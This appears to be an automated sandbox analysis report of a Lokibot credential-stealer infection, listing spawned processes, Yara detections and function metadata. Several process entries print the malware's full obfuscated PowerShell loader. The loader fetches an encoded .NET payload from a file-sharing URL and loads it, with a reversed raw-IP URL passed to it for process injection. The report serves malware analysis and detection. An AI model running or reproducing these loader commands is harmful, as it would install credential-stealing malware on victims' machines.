YnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
Imagebase:	0xd20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:13:59
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:14:00
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
Imagebase:	0xd20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:14:04
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"
Imagebase:	0x8c0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:14:04
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"
Imagebase:	0xff0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:14:08
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
Imagebase:	0x860000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:14:09
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0xd20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:14:09
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:14:09
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
Imagebase:	0xd20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:14:26
Start date:	15/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0xe80000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Function 06C90FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06C90FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06C90FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06C90FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1685664432.0000000006C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6c90000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 9dc8c3b6b0ff07fd5ebb8d404ffdb82bdb123484cd852734bb300091acce2b34
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 6884, Parent PID: 6676COMMON

Executed Functions

Function 03174BB0 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1821334463.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458a0ca0453ee7ca5ddcec02ec3915a4d94e1442cfd8c64fa017199647901d88
Instruction ID: 36e9c1d69bcc5427723e391b66071752c2ae1384f8f23e39b8bb113d49f99b45
Opcode Fuzzy Hash: 458a0ca0453ee7ca5ddcec02ec3915a4d94e1442cfd8c64fa017199647901d88
Instruction Fuzzy Hash: AD221975A002199FCB05CF99D984A9EFBB2FF8C310F298559E814AB365C735ED81CB90

Function 07A01178 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A011B0
tP^q, xrefs: 07A011BA

Memory Dump Source

Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 523758c20c1fc6bd1f23da18a411baaac567d1b568ec8d15b83b7ca9672ef722
Instruction ID: c897febaf9b0fee4473b1608031979bc488b76829665a1db2b0b7be44029ff92
Opcode Fuzzy Hash: 523758c20c1fc6bd1f23da18a411baaac567d1b568ec8d15b83b7ca9672ef722
Instruction Fuzzy Hash: 8DF10A74B003099FCB149F68E844AAEBBF6BFC8710F148869E9259F394DA32DC4587D1

Function 07A004F8 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A0057E
tP^q, xrefs: 07A0058A

Memory Dump Source

Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 3c113410e41fa04b518891833a2f75e1e5c584d31500618df415d8d63dbe5908
Instruction ID: 57d1b888a08f59b4778769be2e089e0a7caad11c52bae0a66660739946d855e5
Opcode Fuzzy Hash: 3c113410e41fa04b518891833a2f75e1e5c584d31500618df415d8d63dbe5908
Instruction Fuzzy Hash: 405147B5B003149FD7209B68A810B2BBBE6ABC5710F14C85AE558DF3D1DA72EC45C3E2

Function 03171A30 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON

Download Yara Rule

APIs

URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031751C9

Memory Dump Source

Source File: 00000001.00000002.1821334463.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3170000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 9fed059d4e4ef673866097f3e0a5fffc851e92aa38f25e021686de25bc0188a9
Instruction ID: 46b20b4b04dfab83b119c218666f005e3c4655eda71eaf3c04f9dc64af69ce7d
Opcode Fuzzy Hash: 9fed059d4e4ef673866097f3e0a5fffc851e92aa38f25e021686de25bc0188a9
Instruction Fuzzy Hash: 5C2115B1D01219EFCB00CF9AD984ADEFBF5FB48310F14812AE918A7210D374AA50CFA4

Function 07A0115B Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A011B0

Memory Dump Source

Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: adf4305e2e086fca52a1d7532043bb045cb7aa348108bd421fe8f9965192573e
Instruction ID: be4a8fb67c90b471d086da04149d257b9ccf70d8cc98f14c120dbac73530fffa
Opcode Fuzzy Hash: adf4305e2e086fca52a1d7532043bb045cb7aa348108bd421fe8f9965192573e
Instruction Fuzzy Hash: 399190B4A00209DFDB18CF58E545AADB7F2BBC8710F248869E8259F394DB71EC458BD1

Function 0310D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820959787.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_310d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc694fe04b9fd49af583cc1f21ab6325ed1b8250099f2be46d93cc3c7d8df7cf
Instruction ID: 470f43f529fb692674130a8d8a00d33e38b8004fd6354b8a0c5689f6d1f45610
Opcode Fuzzy Hash: dc694fe04b9fd49af583cc1f21ab6325ed1b8250099f2be46d93cc3c7d8df7cf
Instruction Fuzzy Hash: 8C01F7714093009BE710CA65DA84767FF9CEF49324F1CC469EC4C4B1CAC7B99881C6B1

Function 0310D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820959787.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_310d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c758e8aef26049356089cd965087686f493ae5f3bd05a18690b7e245daa3902e
Instruction ID: b84ade1cfd57d4ba6ad11e255ad8f542e34140234e1edc6f89739ccc14b8a74f
Opcode Fuzzy Hash: c758e8aef26049356089cd965087686f493ae5f3bd05a18690b7e245daa3902e
Instruction Fuzzy Hash: 62012D7140E3C09FD7128B259994B52BFB4EF47224F1D80CBD8888F1A7C2699848C772

Non-executed Functions

Function 07A00B70 Relevance: 6.4, Strings: 5, Instructions: 169COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A00D5A
4'^q, xrefs: 07A00C27
X=gl, xrefs: 07A00D24
$^q, xrefs: 07A00D4E
4'^q, xrefs: 07A00C33

Memory Dump Source

Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$X=gl$$^q$$^q
API String ID: 0-3800830458
Opcode ID: dde8c0aae8f9ab0148e7c4fd1a615c7d73cea14c7ed884a506dbe0f3db057030
Instruction ID: fc4e16384d43435739fcf9a6da6f578bae7c786a46bd0ff94588845287708091
Opcode Fuzzy Hash: dde8c0aae8f9ab0148e7c4fd1a615c7d73cea14c7ed884a506dbe0f3db057030
Instruction Fuzzy Hash: 8351E3B1A0520A8FCB259B28E4147ABBBF1AFC6310F148C6BD465CB2D5DB31D885C7E1

Function 07A0007F Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A000F7
4'^q, xrefs: 07A000EB
$^q, xrefs: 07A000CA
$^q, xrefs: 07A000D6

Memory Dump Source

Source File: 00000001.00000002.1835287973.0000000007A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a00000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 23d44e6110a9eaac67ecd41947fa474091431dc3f9ceb2a0248f8722c91d7b1c
Instruction ID: dbea24aa3ff4e263bfc5eb152442c7ef8fd3f241c08ae93802489167d279fef4
Opcode Fuzzy Hash: 23d44e6110a9eaac67ecd41947fa474091431dc3f9ceb2a0248f8722c91d7b1c
Instruction Fuzzy Hash: 5401B131A493854FC32B062828202566FB56FC3A1032A49DBC091DF2EBCD658D4A83E2

Analysis Process: powershell.exePID: 4592, Parent PID: 6884COMMON

Executed Functions

Function 07831C10 Relevance: 5.6, Strings: 4, Instructions: 580COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07831F58
4'^q, xrefs: 078320B0
4'^q, xrefs: 078320BA
4'^q, xrefs: 07831F4E

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: b85d206a4385dde5884eb7d1a173ea35caee5c711813092ca4d05d2dc161a342
Instruction ID: dcca91c52ceb93bbfa347dd7c7c4e7e16ec9a4adad0fd45a52982e40e14a181b
Opcode Fuzzy Hash: b85d206a4385dde5884eb7d1a173ea35caee5c711813092ca4d05d2dc161a342
Instruction Fuzzy Hash: 441236B1B043198FC7159B6C981476ABBE2AFE6B11F14C0AAD505CF291DB32C985C7E1

Function 04894C20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

"n^, xrefs: 04894D39

Memory Dump Source

Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID: "n^
API String ID: 0-3005575494
Opcode ID: 165a3f5c4bd6ec209948eb620713facd1ca4befc1fbee53a0cedb99b3a280bc5
Instruction ID: 5e6630edfc4f1c35a0e347fd9b9df71507d9b0ca5ad78c161f37516ef0b2cb75
Opcode Fuzzy Hash: 165a3f5c4bd6ec209948eb620713facd1ca4befc1fbee53a0cedb99b3a280bc5
Instruction Fuzzy Hash: 4B51907090E7E19FD703DB28D86159A7FB0AF47214B0A41DBD484CF2A3D628AC49C7A5

Function 048929F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb7cfc6d3f0d68fef5f6110e579596b9a98b1afe152473cc789a527c4aa3ec1f
Instruction ID: e4bcd777071c4462577b91273a471d6168c81b13262f02feb7033f3e3b57929b
Opcode Fuzzy Hash: fb7cfc6d3f0d68fef5f6110e579596b9a98b1afe152473cc789a527c4aa3ec1f
Instruction Fuzzy Hash: DF917A75A006459FCB15CF58C4989AAFBF1FF48310B288A99D815EB365C735FC91CBA0

Function 07831BEF Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716839198.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7830000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb549a68cf6996998109b8bf30055672a9993ea327f2ad525eb75cd8ca5497d2
Instruction ID: 9fe7234e585d4cbbf12ca97c421b974ae24c44746d0aa36dd615a26e271799e3
Opcode Fuzzy Hash: eb549a68cf6996998109b8bf30055672a9993ea327f2ad525eb75cd8ca5497d2
Instruction Fuzzy Hash: B341F7F0E006099FCB258F1D8449B797BF1BFA6A15F4480A9C808DF252D731C986C7E1

Function 04892B00 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1711809489.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
